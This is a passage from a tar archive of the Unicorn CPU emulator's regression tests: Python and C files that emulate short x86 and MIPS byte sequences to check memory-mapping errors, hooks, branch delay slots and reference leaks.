WRITE) def hook_mem_invalid(uc, access, address, size, value, user_data): return False class InvalidWrite(regress.RegressTest): def test(self): # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # memory address where emulation starts ADDRESS = 0x1000000 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # intercept invalid memory events mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) try: # emulation should return with error UC_ERR_WRITE_UNMAPPED mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE)) except UcError as e: self.assertEqual(e.errno, UC_ERR_WRITE_UNMAPPED) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c�����������������������������������0000664�0000000�0000000�00000001320�14675241067�0025064�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> /* * Disassembly according to capstone: * mulx rsp, rsp, rdx */ #define BINARY "\xc4\xe2\xdb\xf6\xe2" #define MEMORY_SIZE 2 * 1024 * 1024 #define STARTING_ADDRESS 0x1000000 int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } printf("uc_emu_start(…)\n"); uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); printf("done\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/jmp_ebx_hang.py���������������������������������������������������������0000775�0000000�0000000�00000002362�14675241067�0021021�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python """See https://github.com/unicorn-engine/unicorn/issues/82""" import unicorn from unicorn import * import regress CODE_ADDR = 0x10101000 CODE = b'\xff\xe3' # jmp ebx class JumEbxHang(regress.RegressTest): def runTest(self): mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(CODE_ADDR, 1024 * 4) mu.mem_write(CODE_ADDR, CODE) # If EBX is zero then an exception is raised, as expected mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0x0) print(">>> jmp ebx (ebx = 0)") with self.assertRaises(UcError) as m: mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1) self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED) print(">>> jmp ebx (ebx = 0xaa96a47f)") mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(CODE_ADDR, 1024 * 4) # If we write this address to EBX then the emulator hangs on emu_start mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0xaa96a47f) mu.mem_write(CODE_ADDR, CODE) with self.assertRaises(UcError) as m: mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1) self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/jumping.py��������������������������������������������������������������0000775�0000000�0000000�00000014407�14675241067�0020054�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Mariano Graziano from unicorn import * from unicorn.x86_const import * import regress #echo -ne "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" | ndisasm - -b64 #00000000 4831C0 xor rax,rax #00000003 48B8040000000000 mov rax,0x4 # -0000 #0000000D 483D05000000 cmp rax,0x5 #00000013 7405 jz 0x1a #00000015 E90F000000 jmp qword 0x29 #0000001A 48BABEBA00000000 mov rdx,0xbabe # -0000 #00000024 E90F000000 jmp qword 0x38 #00000029 48BACAC000000000 mov rdx,0xc0ca # -0000 #00000033 E900000000 jmp qword 0x38 #00000038 90 nop mu = 0 zf = 1 # (0:clear, 1:set) class Init(regress.RegressTest): def clear_zf(self): eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS) eflags = eflags_cur & ~(1 << 6) #eflags = 0x0 print "[clear_zf] - eflags from %x to %x" % (eflags_cur, eflags) if eflags != eflags_cur: print "[clear_zf] - writing new eflags..." mu.reg_write(UC_X86_REG_EFLAGS, eflags) def set_zf(self): eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS) eflags = eflags_cur | (1 << 6) #eflags = 0xFFFFFFFF print "[set_zf] - eflags from %x to %x" % (eflags_cur, eflags) if eflags != eflags_cur: print "[set_zf] - writing new eflags..." mu.reg_write(UC_X86_REG_EFLAGS, eflags) def handle_zf(self, zf): print "[handle_zf] - eflags " , zf if zf == 0: self.clear_zf() else: self.set_zf() def multipath(self): print "[multipath] - handling ZF (%s) - default" % zf self.handle_zf(zf) # callback for tracing basic blocks def hook_block(self, uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(self, uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) rax = mu.reg_read(UC_X86_REG_RAX) rbx = mu.reg_read(UC_X86_REG_RBX) rcx = mu.reg_read(UC_X86_REG_RCX) rdx = mu.reg_read(UC_X86_REG_RDX) rsi = mu.reg_read(UC_X86_REG_RSI) rdi = mu.reg_read(UC_X86_REG_RDI) r8 = mu.reg_read(UC_X86_REG_R8) r9 = mu.reg_read(UC_X86_REG_R9) r10 = mu.reg_read(UC_X86_REG_R10) r11 = mu.reg_read(UC_X86_REG_R11) r12 = mu.reg_read(UC_X86_REG_R12) r13 = mu.reg_read(UC_X86_REG_R13) r14 = mu.reg_read(UC_X86_REG_R14) r15 = mu.reg_read(UC_X86_REG_R15) eflags = mu.reg_read(UC_X86_REG_EFLAGS) print(">>> RAX = %x" %rax) print(">>> RBX = %x" %rbx) print(">>> RCX = %x" %rcx) print(">>> RDX = %x" %rdx) print(">>> RSI = %x" %rsi) print(">>> RDI = %x" %rdi) print(">>> R8 = %x" %r8) print(">>> R9 = %x" %r9) print(">>> R10 = %x" %r10) print(">>> R11 = %x" %r11) print(">>> R12 = %x" %r12) print(">>> R13 = %x" %r13) print(">>> R14 = %x" %r14) print(">>> R15 = %x" %r15) print(">>> ELAGS = %x" %eflags) print "-"*11 self.multipath() print "-"*11 # callback for tracing memory access (READ or WRITE) def hook_mem_access(self, uc, access, address, size, value, user_data): if access == UC_MEM_WRITE: print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ %(address, size, value)) else: # READ print(">>> Memory is being READ at 0x%x, data size = %u" \ %(address, size)) # callback for tracing invalid memory access (READ or WRITE) def hook_mem_invalid(self, uc, access, address, size, value, user_data): print("[ HOOK_MEM_INVALID - Address: %s ]" % hex(address)) if access == UC_MEM_WRITE_UNMAPPED: print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" %(address, size, value)) return True else: print(">>> Missing memory is being READ at 0x%x, data size = %u, data value = 0x%x" %(address, size, value)) return True def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): print("[ HOOK_MEM_FETCH - Address: %s ]" % hex(address)) print("[ mem_fetch_unmapped: faulting address at %s ]" % hex(address).strip("L")) return True def runTest(self): global mu JUMP = "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" ADDRESS = 0x1000000 print("Emulate x86_64 code") # Initialize emulator in X86-64bit mode mu = Uc(UC_ARCH_X86, UC_MODE_64) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, JUMP) # setup stack mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, self.hook_block) # tracing all instructions in range [ADDRESS, ADDRESS+0x60] mu.hook_add(UC_HOOK_CODE, self.hook_code, None, ADDRESS, ADDRESS+0x60) # tracing all memory READ & WRITE access mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) mu.hook_add(UC_HOOK_MEM_READ, self.hook_mem_access) mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(JUMP)) except UcError as e: print("ERROR: %s" % e) rdx = mu.reg_read(UC_X86_REG_RDX) self.assertEqual(rdx, 0xbabe, "RDX contains the wrong value. Eflags modification failed.") if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/leaked_refs.py����������������������������������������������������������0000664�0000000�0000000�00000003024�14675241067�0020635�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from __future__ import print_function import time from unicorn import * from unicorn.x86_const import * import objgraph import regress ADDRESS = 0x8048000 STACK_ADDRESS = 0xffff000 STACK_SIZE = 4096 ''' 31 DB xor ebx, ebx 53 push ebx 43 inc ebx 53 push ebx 6A 02 push 2 6A 66 push 66h 58 pop eax 89 E1 mov ecx, esp CD 80 int 80h ''' CODE = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" EP = ADDRESS + 0x54 def hook_code(mu, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) def emu_loop(): emu = Uc(UC_ARCH_X86, UC_MODE_32) emu.mem_map(ADDRESS, 0x1000) emu.mem_write(EP, CODE) emu.mem_map(STACK_ADDRESS, STACK_SIZE) emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE) i = emu.hook_add(UC_HOOK_CODE, hook_code, None) emu.hook_del(i) emu.emu_start(EP, EP + len(CODE), count = 3) print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP)) def debugMem(): import gc gc.collect() # don't care about stuff that would be garbage collected properly #print("Orphaned objects in gc.garbage:", gc.garbage) assert(len(objgraph.by_type("Uc")) == 0) #assert(len(objgraph.get_leaking_objects()) == 0) class EmuLoopReferenceTest(regress.RegressTest): def runTest(self): for i in range(5): emu_loop() debugMem() if __name__ == '__main__': regress.main()������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/map_crash.c�������������������������������������������������������������0000664�0000000�0000000�00000001323�14675241067�0020120�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #define UC_BUG_WRITE_SIZE 13000 #define UC_BUG_WRITE_ADDR 0x1000 int main(void) { int size; uint8_t *buf; uc_engine *uc; uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); if (err) { fprintf (stderr, "Cannot initialize unicorn\n"); return 1; } size = UC_BUG_WRITE_SIZE; buf = malloc (size); if (!buf) { fprintf (stderr, "Cannot allocate\n"); return 1; } memset (buf, 0, size); if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { uc_mem_write (uc, UC_BUG_WRITE_ADDR, buf, size); } uc_close(uc); free(buf); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/map_write.c�������������������������������������������������������������0000664�0000000�0000000�00000002153�14675241067�0020154�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <stdlib.h> #define ADDR 0x00400000 #define SIZE 1024*64 #define OVERFLOW 1 int main(void) { uc_engine *uc = NULL; uint8_t *buf = NULL, *buf2 = NULL; int i; uc_err err; err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf ("uc_open %d\n", err); goto exit; } err = uc_mem_map (uc, ADDR, SIZE, UC_PROT_ALL); if (err) { printf ("uc_mem_map %d\n", err); goto exit; } buf = calloc (SIZE*2, 1); buf2 = calloc (SIZE, 1); for (i=0;i<SIZE; i++) { buf[i] = i & 0xff; } /* crash here */ err = uc_mem_write (uc, ADDR, buf, SIZE+OVERFLOW); if (err) { printf ("uc_mem_write %d\n", err); goto exit; } err = uc_mem_read (uc, ADDR+10, buf2, 4); if (err) { printf ("uc_mem_read %d\n", err); goto exit; } if (buf2[0] != 0xa) { printf ("mem contents are wrong\n"); goto exit; } printf ("OK\n"); exit: if (uc) uc_close (uc); free (buf); free (buf2); return err ? 1 : 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/memmap.py���������������������������������������������������������������0000775�0000000�0000000�00000002136�14675241067�0017653�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #9 # this prints out 2 lines and the contents must be the same from unicorn import * import regress class MemMap(regress.RegressTest): def test_mmap_write(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(0x8048000, 0x2000) uc.mem_write(0x8048000, 'test') s1 = str(uc.mem_read(0x8048000, 4)).encode('hex') self.assertEqual('test'.encode('hex'), s1) uc.mem_map(0x804a000, 0x8000) s2 = str(uc.mem_read(0x8048000, 4)).encode('hex') self.assertEqual(s1, s2) def test_mmap_invalid(self): u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) with self.assertRaises(UcError): u.mem_map(0x2000, 0) with self.assertRaises(UcError): u.mem_map(0x4000, 1) def test_mmap_weird(self): u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) for i in xrange(20): with self.assertRaises(UcError): u.mem_map(i*0x1000, 5) u.mem_read(i*0x1000+6, 1) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/memmap_segfault.py������������������������������������������������������0000775�0000000�0000000�00000001740�14675241067�0021545�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import unicorn from unicorn import * import regress class MmapSeg(regress.RegressTest): def test_seg1(self): u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) u.mem_map(0x2000, 0x1000) u.mem_read(0x2000, 1) for i in range(50): u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) u.mem_map(i*0x1000, 0x1000) u.mem_read(i*0x1000, 1) for i in range(20): with self.assertRaises(UcError): u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) u.mem_map(i*0x1000, 5) u.mem_read(i*0x1000, 1) def test_seg2(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(0x0000, 0x2000) uc.mem_map(0x2000, 0x4000) uc.mem_write(0x1000, 0x1004 * ' ') self.assertTrue(1, 'If not reached, then we have BUG (crash on x86_64 Linux).') if __name__ == '__main__': regress.main() ��������������������������������unicorn-2.1.1/tests/regress/mips_branch_delay.py����������������������������������������������������0000775�0000000�0000000�00000002045�14675241067�0022041�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from capstone import * from unicorn import * import regress class MipsBranchDelay(regress.RegressTest): def runTest(self): md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS32 + CS_MODE_LITTLE_ENDIAN) def disas(code, addr): for i in md.disasm(code, addr): print '0x%x: %s %-6s %s' % (i.address, str(i.bytes).encode('hex'), i.mnemonic, i.op_str) def hook_code(uc, addr, size, _): mem = str(uc.mem_read(addr, size)) disas(mem, addr) CODE = 0x400000 asm = '0000a4126a00822800000000'.decode('hex') # beq $a0, $s5, 0x4008a0; slti $v0, $a0, 0x6a; nop print 'Input instructions:' disas(asm, CODE) print print 'Hooked instructions:' uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) uc.hook_add(UC_HOOK_CODE, hook_code) uc.mem_map(CODE, 0x1000) uc.mem_write(CODE, asm) self.assertEqual(None, uc.emu_start(CODE, CODE + len(asm))) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_branch_likely_issue.c����������������������������������������������0000664�0000000�0000000�00000013214�14675241067�0023233�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Test for MIPS branch likely instructions only executing their delay slot instruction when the branch is taken. Currently it seems to always execute the delay slot instruction like a normal non-"likely" style branch. */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #include <process.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #include "pthread.h" #endif // _MSC_VER // common includes #include <string.h> const uint64_t addr = 0x100000; // This code SHOULD execute the instruction at 0x100010. const unsigned char test_code_1[] = { 0x00,0x00,0x04,0x24, // 100000: li $a0, 0 0x01,0x00,0x02,0x24, // 100004: li $v0, 1 0x02,0x00,0x03,0x24, // 100008: li $v1, 2 0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014 0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0 }; // This code SHOULD NOT execute the instruction at 0x100010. const unsigned char test_code_2[] = { 0x00,0x00,0x04,0x24, // 100000: li $a0, 0 0x01,0x00,0x02,0x24, // 100004: li $v0, 1 0x01,0x00,0x03,0x24, // 100008: li $v1, 1 0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014 0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0 }; int test_num = 0; // flag for whether the delay slot was executed by the emulator bool test1_delayslot_executed = false; bool test2_delayslot_executed = false; // flag for whether the delay slot had a code hook called for it bool test1_delayslot_hooked = false; bool test2_delayslot_hooked = false; // This hook is used to show that code is executing in the emulator. static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Test %d Executing: %"PRIx64"\n", test_num, address); if( test_num == 1 && address == 0x100010 ) { printf("Delay slot hook called!\n"); test1_delayslot_hooked = true; } if( test_num == 2 && address == 0x100010 ) { printf("Delay slot hook called!\n"); test2_delayslot_hooked = true; } } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_err err; uc_hook hhc; uint32_t val; // Initialize emulator in MIPS 32bit little endian mode printf("uc_open()\n"); err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return err; } // map in a page of mem printf("uc_mem_map()\n"); err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return err; } // hook all instructions by having @begin > @end printf("uc_hook_add()\n"); uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); if( err ) { printf("Failed on uc_hook_add(code) with error returned: %u\n", err); return err; } // write test1 code to be emulated to memory test_num = 1; printf("\nuc_mem_write(1)\n"); err = uc_mem_write(uc, addr, test_code_1, sizeof(test_code_1)); if( err ) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return err; } // start executing test code 1 printf("uc_emu_start(1)\n"); uc_emu_start(uc, addr, addr+sizeof(test_code_1), 0, 0); // read the value from a0 when finished executing uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); if( val != 0 ) test1_delayslot_executed = true; // write test2 code to be emulated to memory test_num = 2; printf("\nuc_mem_write(2)\n"); err = uc_mem_write(uc, addr, test_code_2, sizeof(test_code_2)); if( err ) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return err; } // start executing test code 2 printf("uc_emu_start(2)\n"); uc_emu_start(uc, addr, addr+sizeof(test_code_2), 0, 0); // read the value from a0 when finished executing uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); if( val != 0 ) test2_delayslot_executed = true; // free resources printf("\nuc_close()\n"); uc_close(uc); // print test results printf("\n\nTest 1 SHOULD execute the delay slot instruction:\n"); printf(" Emulator %s execute the delay slot: %s\n", test1_delayslot_executed ? "did" : "did not", test1_delayslot_executed ? "CORRECT" : "WRONG"); printf(" Emulator %s hook the delay slot: %s\n", test1_delayslot_hooked ? "did" : "did not", test1_delayslot_hooked ? "CORRECT" : "WRONG"); printf("\n\nTest 2 SHOULD NOT execute the delay slot instruction:\n"); printf(" Emulator %s execute the delay slot: %s\n", test2_delayslot_executed ? "did" : "did not", !test2_delayslot_executed ? "CORRECT" : "WRONG"); printf(" Emulator %s hook the delay slot: %s\n", test2_delayslot_hooked ? "did" : "did not", !test2_delayslot_hooked ? "CORRECT" : "WRONG"); // test 1 SHOULD execute the instruction in the delay slot if( test1_delayslot_hooked == true && test1_delayslot_executed == true ) printf("\n\nTEST 1 PASSED!\n"); else printf("\n\nTEST 1 FAILED!\n"); // test 2 SHOULD NOT execute the instruction in the delay slot if( test2_delayslot_hooked == false && test2_delayslot_executed == false ) printf("TEST 2 PASSED!\n\n"); else printf("TEST 2 FAILED!\n\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_cp1.py�������������������������������������������������������������0000664�0000000�0000000�00000000511�14675241067�0020102�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.mips_const import * # .text:00416CB0 cfc1 $v1, FCSR shellcode = [0x44, 0x43, 0xF8, 0x00] base = 0x416CB0 uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) uc.mem_map(0x416000, 0x1000) uc.mem_write(base, bytes(shellcode)) uc.emu_start(base, base + len(shellcode))���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_delay_slot_code_hook.c���������������������������������������������0000664�0000000�0000000�00000006502�14675241067�0023370�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Test for code hook being called for instructions in branch delay slot in MIPS cpu. See issue https://github.com/unicorn-engine/unicorn/issues/290 The code hook should be called for every instruction executed. This test checks that the code hook is correctly called for instructions in branch delay slots. In this test the loop check value is decremented inside the branch delay shot. This helps to show that the instruction in the branch delay slot is being executed, but that the code hook is just not occurring. */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #endif // _MSC_VER // common includes #include <string.h> // Test MIPS little endian code. // It should loop 3 times before ending. const uint64_t addr = 0x100000; const unsigned char loop_test_code[] = { 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 // loop1 0x00,0x00,0x00,0x00, // 100004: nop 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 0xFF,0xFF,0x84,0x24, // 10000C: addiu $a0, -1 }; bool test_passed_ok = false; int loop_count = 0; static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { if( address == 0x10000C ) test_passed_ok = true; if( address == 0x100004 ) { printf("\nloop %d:\n", loop_count); loop_count++; } printf("Code: %"PRIx64"\n", address); } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_err err; uc_hook hhc; uint32_t val; // Initialize emulator in MIPS 32bit little endian mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return err; } // map in a page of mem err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return err; } // write machine code to be emulated to memory err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code)); if( err ) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return err; } // hook all instructions by having @begin > @end uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); if( err ) { printf("Failed on uc_hook_add(code) with error returned: %u\n", err); return err; } // execute code printf("---- Executing Code ----\n"); err = uc_emu_start(uc, addr, addr + sizeof(loop_test_code), 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); return err; } // done executing, print some reg values as a test printf("---- Execution Complete ----\n\n"); uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); // free resources uc_close(uc); if( test_passed_ok ) printf("\n\nTEST PASSED!\n\n"); else printf("\n\nTEST FAILED!\n\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_except.py����������������������������������������������������������0000775�0000000�0000000�00000002217�14675241067�0020717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.mips_const import * import regress def hook_intr(uc, intno, _): print 'interrupt', intno CODE = 0x400000 asm = '0000a48f'.decode('hex') # lw $a0, ($sp) class MipsExcept(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) uc.hook_add(UC_HOOK_INTR, hook_intr) uc.mem_map(CODE, 0x1000) uc.mem_write(CODE, asm) with self.assertRaises(UcError) as m: uc.reg_write(UC_MIPS_REG_SP, 0x400001) uc.emu_start(CODE, CODE + len(asm), 300) self.assertEqual(UC_ERR_READ_UNALIGNED, m.exception.errno) with self.assertRaises(UcError) as m: uc.reg_write(UC_MIPS_REG_SP, 0xFFFFFFF0) uc.emu_start(CODE, CODE + len(asm), 200) self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno) with self.assertRaises(UcError) as m: uc.reg_write(UC_MIPS_REG_SP, 0x80000000) uc.emu_start(CODE, CODE + len(asm), 100) self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_invalid_read_of_size_4_when_tracing.c������������������������������0000664�0000000�0000000�00000002112�14675241067�0026322�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("tracing\n"); } #define HARDWARE_ARCHITECTURE UC_ARCH_MIPS #define HARDWARE_MODE UC_MODE_MIPS32 #define MEMORY_STARTING_ADDRESS 0x1000000 #define MEMORY_SIZE 2 * 1024 * 1024 #define MEMORY_PERMISSIONS UC_PROT_ALL #define BINARY_CODE "00000000000000000000000000AA" int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, 